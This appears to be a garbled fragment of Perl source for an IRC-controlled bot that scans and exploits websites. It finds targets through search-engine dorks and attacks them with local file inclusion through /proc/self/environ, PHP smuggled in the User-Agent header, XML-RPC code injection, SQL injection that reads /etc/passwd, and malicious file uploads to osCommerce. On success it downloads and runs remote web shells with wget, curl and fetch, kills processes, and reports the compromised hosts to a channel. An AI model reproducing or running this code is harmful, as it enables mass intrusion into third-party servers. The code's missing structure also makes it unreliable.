my $url = $_[0];

my $chan = $_[1];

my $site = $_[2];

my $dor = $url.$botshell."??";

my $dor2 = $url.$botshell2."??";

my $test = $url.$injector."??";

my $vuln = $url."#14(ByroeNet)";

my $check = &get_content($test);

&get_content($dor);sleep(1);

&get_content($dor2);sleep(1);

if ( $check =~ /JANCOK- exploit/i ) {

my $safe ="";

my $os ="";

my $free ="";

if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}

if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}

&msg("$chan","$rfilogo(#4@#9VuLn#15)#13 ".$vuln."#9(#4@#15SafeMode= $safe#9)

(#4@#15OS= $os#9)(#4@#15FreeSpace= $free#9)(#4@#9safemode-off#15)");

&msg("$admin","$rfilogo(#4@#9VuLn#15)#13 ".$vuln."#9(#4@#15SafeMode= $safe#9)

(#4@#15OS= $os#9)(#4@#15FreeSpace= $free#9)");

else {&msg("$chan","$rfilogo(#4@#9VuLn#15)#10 ".$vuln."

(#4@#7safemode-on#15)#");}

sub lfi() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$lfilogo(#4@#9$engine#15)#10 Scan

finish"); }

my $dir = "../../../../../../../../../../../../../";
 my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";

my $vuln = "http://".$site."#12".$bug.$dir."/proc/self/environ%0000";

my $shell = "http://".$site."#12".$bug.$dir."/tmp/ipays%0000";

my $html = &get_content($test);

if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork)

{ exit; } else {

my $code = 'echo
"c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.
$injector.'","/tmp/ipays")) { echo "SUCCESS";@copy("'.
$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';

my $res = lfi_env_query($test,encode_base64($code));

&lfi_spread_query($test);

&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);

&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");

$res =~ s/\n//g;

if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {

my $sys = $1;

$nob0dy = $2;

&msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 ".$shell." #15(#4@#9".

$sys."#15))#15(#4@#9$nob0dy#15)#");sleep(2);

elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {

 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork)
{ exit; } else {

my $sys = $1;

$nob0dy = $2;

my $upload = 'system("killall -9 perl;killall -9

php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg
aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg
byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg
allnet.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O
aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O
byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O
allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");';

my $wget = lfi_env_query($test,encode_base64($upload));
sleep(2);

my $check = &get_content("http://".$site.$bug.
$dir."/tmp/ipays%0000"); sleep(2);

&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);

&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);

if ($check =~ /JANCOK- exploit/) {

&msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 ".$shell." #15(#4@#3".

$sys."#15)#15(#4@#9$nob0dy#15)#");sleep(2);

&msg("$admin","$lfilogo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 ".$shell."
#15(#4@#3".$sys."#15)#15(#4@#9$nob0dy#15)#");sleep(2);

else {

&msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9SysTem#15)#7 ".$vuln." #15(#4@#3".

$sys."#15))#15(#4@#9$nob0dy#15)#");sleep(2);
 }

} exit; }

else
{ &msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9EnviRon#15)#10 ".$vuln); }

} exit; } sleep(2);

sub lfi_env_query() {

my $url = $_[0];

my $code = $_[1];

my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");

$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);

return $res->content;

}
sub lfi_spread_query() {

my $url = $_[0];

my $code = "system('cd /tmp;rm -rf allnet.* *.jpg.*;fetch ".$botshell.";php

byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl
-O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php
byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".
$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php
allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd
/var/tmp;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php
byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf
byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php
allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf
allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".
$botshell2.";php allnet.jpg;rm -rf *.jp*;');";

my $ua = LWP::UserAgent->new(agent => "<?

eval(base64_decode('".encode_base64($code)."'));?>");

$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);

sub xml() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;
 my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$xmllogo(#4@#8$engine#15)#10 Scan

finish"); }

my $test = "http://".$site.$bug;

my $vuln = "http://".$site."#13".$bug;

my $html = &get_content($test);

if ($html =~ /faultCode/ ) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; }

else {

my $resp = &xml_cek_query($test);

if ($resp =~ /j13mb0t(.*)j13mb0t/s) {

&xml_spread_query($test);sleep(2);

my $sys = $1;

my $check = &get_content("http://".$site."aspaltx.php");

&get_content("http://".$site."byroe.php");

&get_content("http://".$site."allnet.php");

if ($check =~ /JANCOK- exploit/) {

&msg("$chan","$xmllogo(#4@#8$engine#15)#15(#13@#9SheLL#15)#13 http://".
$site."#7aspaltx.php #3".$sys);&get_content("http://".$site."byroe.php");
sleep(2);}

else {

&msg("$chan","$xmllogo(#4@#8$engine#15)#15(#4@#9SysTem#15)#7 ".$vuln." #3".$sys);

sleep(2);}

sleep(2); } exit; } }

sub xml_cek_query() {

my $url = $_[0];

my $code = "system('uname -a');";

my $ua = LWP::UserAgent->new(agent => 'perl post');

$exploit = "<?xml version=\"1.0\"?><methodCall>";

$exploit .= "<methodName>test.method</methodName>";

$exploit .= "<params><param><value><name>',''));";

$exploit .= "echo'j13mb0t';".
$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";

$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);

return $res->content;

sub xml_spread_query() {

my $xmltargt = $_[0];

my $xmlsprd = "system('wget ".$injector." -O aspaltx.php;fetch ".$injector.";mv

ipays.jpg aspaltx.php;wget ".$botshell." -O byroe.php;fetch ".$botshell.";mv
byroe.jpg byroe.php;wget ".$botshell2." -O allnet.php;fetch ".$botshell2.";mv
allnet.jpg allnet.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.*
*.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php
byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf
byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php
allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf
allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".
$botshell2.";php allnet.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".
$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf
byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".
$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf
allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".
$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php
allnet.jpg;');";

my $userAgent = LWP::UserAgent->new(agent => 'perl post');

$exploit = "<?xml version=\"1.0\"?><methodCall>";

$exploit .= "<methodName>test.method</methodName>";

$exploit .= "<params><param><value><name>',''));";

$exploit .= "echo'j13m';".
$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";

$userAgent->timeout(7);

$userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content =>

$exploit);
}

sub sql() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$sqllogo(#4@#8$engine#15)#10 Scan

finish"); }

my $test = "http://".$site.$bug."'";

my $vuln = "http://".$site."#4".$bug;

my $sqlsite = "http://".$site.$bug;

my $html = &get_content($test);

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ m/You have an error in your SQL syntax/i || $html =~

m/Query failed/i || $html =~ m/SQL query failed/i ) {

&sqlbrute($sqlsite,$chan,$engine);}

elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed

quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9MsSQL#15)#13 ".
$vuln);}

elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft

Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9MsAccess#15)#13 ".
$vuln);}

elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html

=~ m/mysql_fetch_array/i ) {

&sqlbrute($sqlsite,$chan,$engine);}

} exit; sleep(2); }

sub sqlbrute() {

my $situs=$_[0];

my $chan =$_[1];

my $engine=$_[2];

my $columns=20;

my $cfin.="--";
my $cmn.= "+";

for ($column = 0 ; $column < $columns ; $column ++)

$union.=','.$column;

$inyection.=','."0x6c6f67696e70776e7a";

if ($column == 0)

$inyection = '';

$union = '';

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cfin;

$response=get($sql);

if($response =~ /loginpwnz/)

$column ++;

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)#13 $sql #");

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;

$response=get($sql)or die("[-] Impossible to get Information_Schema\n");

 if($response =~ /loginpwnz/)

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".
$cmn."information_schema.tables".$cfin;

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13INFO_SCHEMA#15)#13
$sql #");

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."mysql.user".$cfin;

$response=get($sql)or die("[-] Impossible to get MySQL.User\n");

if($response =~ /loginpwnz/)

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".
$cmn."mysql.user".$cfin;

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13USER#15)#13 $sql #");

else

while ($loadcont < $column-1)

$loadfile.=','.'load_file(0x2f6574632f706173737764)';

$loadcont++;
 }

$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;

$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");

if($response =~ /root:x:/)

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13Load File#15)#13 $sql

#");

else

foreach $tabla(@tabele)

chomp($tabla);

$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;

$response=get($sql)or die("[-] Impossible to get tables\n");

if($response =~ /loginpwnz/)

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.
$cmn."from".$cmn.$tabla.$cfin;
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13Tabel#15)#13 $sql
#");

&tabelka($situs,$tabla,$chan,$engine);

sub tabelka() {

my $situs =$_[0];

my $tabla =$_[1];

my $chan =$_[2];

my $engine=$_[3];

my $cfin.="--";

my $cmn.= "+";

chomp($tabla);

foreach $columna(@kolumny)

chomp($columna);
 $sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.
$tabla.$cfin;

$response=get($sql)or die("[-] Impossible to get columns\n");

if ($response =~ /loginpwnz/)

&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13SQLi Vuln#15)#9
$situs #14(#4@#13Kolom#14)#13 $columna #14(#4@#13Tabel#14)#13 $tabla #");

sub osco() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);

my $num = scalar(@list);

if ($num > 0) {
 foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$oscologo(#4@#8$engine#15)#10

Scan finish"); }

my $test = "http://".$site.$bug;

my $html = &get_content($test);

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ /Warning: No file uploaded/ ) {

# &msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9System#15)#7 ".
$test);

&osco_xpl($test,$chan,$site,$engine);

} else { }

} exit; sleep(2); }

sub osco_xpl() {

my $browser = LWP::UserAgent->new;

my $url = $_[0];

my $chan = $_[1];
my $site = $_[2];

my $engine = $_[3];

my $res = $browser->post( $url,['products_image' => ['./ipays.jpg' => 'bronsx.php'

=> 'application/octet-stream']],'Content-Type' => 'form-data');

my $resa = $browser->post( $url,['products_image' => ['./maza.jpg' => 'aspaltx.php'

=> 'application/octet-stream']],'Content-Type' => 'form-data');

my $resb = $browser->post( $url,['products_image' => ['./byroe.jpg' => 'byroe.php'

=> 'application/octet-stream']],'Content-Type' => 'form-data');

my $resc = $browser->post( $url,['products_image' => ['./allnet.jpg' =>

'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $hasil = $res->as_string;

my $hasil1 = $resa->as_string;

my $hasil2 = $resb->as_string;

my $hasil3 = $resc->as_string;

my $check = &get_content("http://".
$site."images/aspaltx.php");&get_content("http://".
$site."images/byroe.php");&get_content("http://".
$site."images/allnet.html");sleep(3);

if ($check =~ /JANCOK- exploit/) {

my $safe ="";

my $os ="";

my $free ="";

if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}

 if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}

&msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4aspaltx.php #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);

&msg("$admin","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4allnet.html #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);

sub osco2() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$oscologo(#4@#8$engine#15)#10

Scan finish"); }

my $test = "http://".$site.$bug;

my $html = &get_content($test);

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ /TABLE_HEADING_FILENAME/ ) {

# &msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9System#15)#7 ".
$test);

&osco_xpl2($test,$chan,$site,$engine);

} else { }

} exit; sleep(2); }

sub osco_xpl2() {

my $browser = LWP::UserAgent->new;

my $url = $_[0]."?action=processuploads";

my $chan = $_[1];

my $site = $_[2];

my $engine = $_[3];

my $res = $browser->post( $url,['file_1' => ['./ipays.jpg' => 'bronsx.php' =>

'application/octet-stream']],'Content-Type' => 'form-data');

my $resa = $browser->post( $url,['file_1' => ['./maza.jpg' => 'aspaltx.php' =>

'application/octet-stream']],'Content-Type' => 'form-data');

my $resb = $browser->post( $url,['file_1' => ['./byroe.jpg' => 'byroe.php' =>

'application/octet-stream']],'Content-Type' => 'form-data');

my $resc = $browser->post( $url,['file_1' => ['./allnet.jpg' => 'allnet.html' =>

'application/octet-stream']],'Content-Type' => 'form-data');

my $hasil = $res->as_string;

my $hasil1 = $resa->as_string;

my $hasil2 = $resb->as_string;

my $hasil3 = $resc->as_string;

my $check = &get_content("http://".
$site."images/aspaltx.php");&get_content("http://".
$site."images/byroe.php");&get_content("http://".
$site."images/allnet.html");sleep(3);

if ($check =~ /JANCOK- exploits/) {

my $safe ="";

my $os ="";

my $free ="";

if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}

if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}

&msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4aspaltx.php #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);

&msg("$admin","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4allnet.html #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);

sub loko() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$lokologo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$lokologo(#4@#8$engine#15)#10

Scan finish"); }

my $test = "http://".$site."filemanager/browser.html";

my $vuln = "http://".$site."filemanager/browser.html";
 my $re = &get_content($test);

if ($re =~ /$loko_output/){

&msg("$chan", "$lokologo(#4@#8$engine#15)(#4@#13VulN#15)#13 ".

$vuln."#15(#4@#0UPLOAD#15)#");

sub op() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;
 if ($count == $num-1) { &msg("$chan","$oplogo(#4@#8$engine#15)#10 Scan
finish"); }

my $test = "http://".$site.$open_test;

my $vuln = "http://".
$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";

my $re = &get_content($test);

if ($re =~ /$open_output/){

&msg("$chan", "$oplogo(#4@#8$engine#15)(#4@#13VulN#15)#13 ".

$vuln."#15(#4@#0UPLOAD#15)#");

sub zen() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);

my $num = scalar(@list);
 if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$zenlogo(#4@#8$engine#15)#10 Scan

finish"); }

my $test = "http://".
$site."admin/record_company.php/password_forgotten.php?action=insert";

my $vuln = "http://".$site."images/#4brons.php";

my $que = "INSERT INTO admin (admin_id, admin_name, admin_email,

admin_pass) VALUES
(56,'adminsys','admin@mazacrew.co.cc','617ec22fbb8f201c366e9848c0eb6925:87');";

my $re = &get_content($vuln);

if ($re =~ /JANCOK- exploit/i){

&msg("$chan", "$zenlogo(#4@#8$engine#15)(#4@#13Shell#15)#13 ".

$vuln."#");

else{

# &msg("$chan", "$zenlogo(#4@#8$engine#15)(#4@#13GaGaL#15)#4 ".

$vuln."#15(#4@#9Ab0rteD#15)#");

}
######################################### ADDED

sub thumb() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$thumblogo(#4@#9$engine#15)#10 Scan finish");

}

my $coba = "http://".$site.$bug."timthumb.php?src=".$thumbshell."";

my $cek = &get_content($coba);sleep(1);

my $aa = "cache/c54af1d13e884a4c63da8f3098a7a4da.php";

my $ab = "temp/c54af1d13e884a4c63da8f3098a7a4da.php";

my $ceck1 = "http://".$site.$bug.".$aa";
my $ceck2 = "http://".$site.$bug.".$ab";

my $loco1 = &get_content($ceck1);sleep(1);

my $loco2 = &get_content($ceck2);sleep(1);

if ($cek =~ /tripl3k was Here/i) {

my $vuln = "http://".$site.
$bug."cache/c54af1d13e884a4c63da8f3098a7a4da.php";

&msg("$chan", "$thumblogo(#4@#8$engine#15)(#4@#4VulN#15)#4 ".$vuln." #15(#4@#9

0WN3D #15)#");

#########################################

sub search_engine() {

my (@total,@clean);

my $chan = $_[0];

my $bug = $_[1];
 my $dork = $_[2];

my $engine = $_[3];

my $logo = $_[4];

if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }

if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }

if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }

if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork);

push(@total,@altavista); }

if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }

if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }

if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }

if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }

if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }

if ($engine eq "GooGle2") { my @google2 = &google2($dork);

push(@total,@google2); }

if ($engine eq "ExaLead") { my @exalead = &exalead($dork);

push(@total,@exalead); }

if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }

if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork);

push(@total,@virgilio); }

if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }

if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }

 if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }

if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }

if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }

if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }

if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }

if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }

if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }

if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }

if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }

if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }

if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }

if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }

if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }

if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }

if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }

if ($engine eq "TisCali") { my @tiscali = &tiscali($dork);

push(@total,@tiscali); }

if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }

@clean = &clean(@total);

&msg("$chan","$logo(#4@#8$engine#15)#4 Total:#0 (".scalar(@total).")#4 Clean:#0

(".scalar(@clean).")#");
 return @clean;

#########################################

sub isFound() {

my $status = 0;

my $link = $_[0];

my $reqexp = $_[1];

my $res = &get_content($link);

if ($res =~ /$reqexp/) { $status = 1 }

return $status;

sub get_content() {

my $url = $_[0];

my $ua = LWP::UserAgent->new(agent => $uagent);

$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);
 return $res->content;

######################################### SEARCH ENGINE gibla

sub google() {

my @list;

my $key = $_[0];

for (my $i=0; $i<=400; $i+=10){

my $search = ("http://www.google.com/search?
q=".&key($key)."&num=100&filter=0&start=".$i);

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

if ($1 !~ /google/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}
 return @list;

sub rediff() {

my @list;

my $key = $_[0];

for (my $i=0; $i<=500; $i+=10) {

my $search = ("http://search1.rediff.com/dirsrch/default.asp?
MT=".&key($key)."&iss=&submit=Search&firstres=".$i);

$b = "$i";

my $res = &search_engine_query($search);

if ($res !~ /firstres=$b\'>/) {$i=500;}

while ($res =~ m/<a href=\"http:\/\/(.*?)\" onmousedown/g) {

if ($1 !~ /rediff\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;
}

sub uol() {

my @list;

my $key = $_[0];

for (my $i=1; $i<=500; $i+=10) {

my $search = ("http://mundo.busca.uol.com.br/buscar.html?
q=".&key($key)."&start=".$i);

my $res = &search_engine_query($search);

if ($res !~ m/<span class=\"next\">pr&#243;xima<\/span>/){$i=500;}

while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {

if ($1 !~ /uol\.com/) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
sub bing() {

my @list;

my $key = $_[0];

for (my $i=1; $i<=500; $i+=10) {

my $search = ("http://www.bing.com/search?
q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");

my $res = &search_engine_query($search);

if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}

while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

if ($1 !~ /bing\.com/) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
sub altavista() {

my @list;

my $key = $_[0];

for (my $i=1; $i<=500; $i+=10){

my $search = ("http://it.altavista.com/web/results?
itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);

my $res = &search_engine_query($search);

if ($res !~ /target=\"_self\">Succ/) {$i=500;}

while ($res =~ m/<span class=ngrn>(.+?)\//g) {

if ($1 !~ /altavista/){

my $link = $1;

$link =~ s/<//g;

$link =~ s/ //g;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
sub ask() {

my @list;

my $key = $_[0];

for (my $i=1; $i<=50; $i+=1) {

my $search = ("http://it.ask.com/web?
q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".
$i."&jss=1&dm=all");

my $res = &search_engine_query($search);

if ($res !~ /Successiva/) {$i=50;}

while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {

if ($1 !~ /ask\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub yahoo(){
 my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=500; $b+=10) {

my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/http\%3a\/\/(.+?)\"/g) {

if ($1 !~ /yahoo\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub clusty() {

my @list;
my $key = $_[0];

my $b = 0;

for ($b=10; $b<=500; $b+=10) {

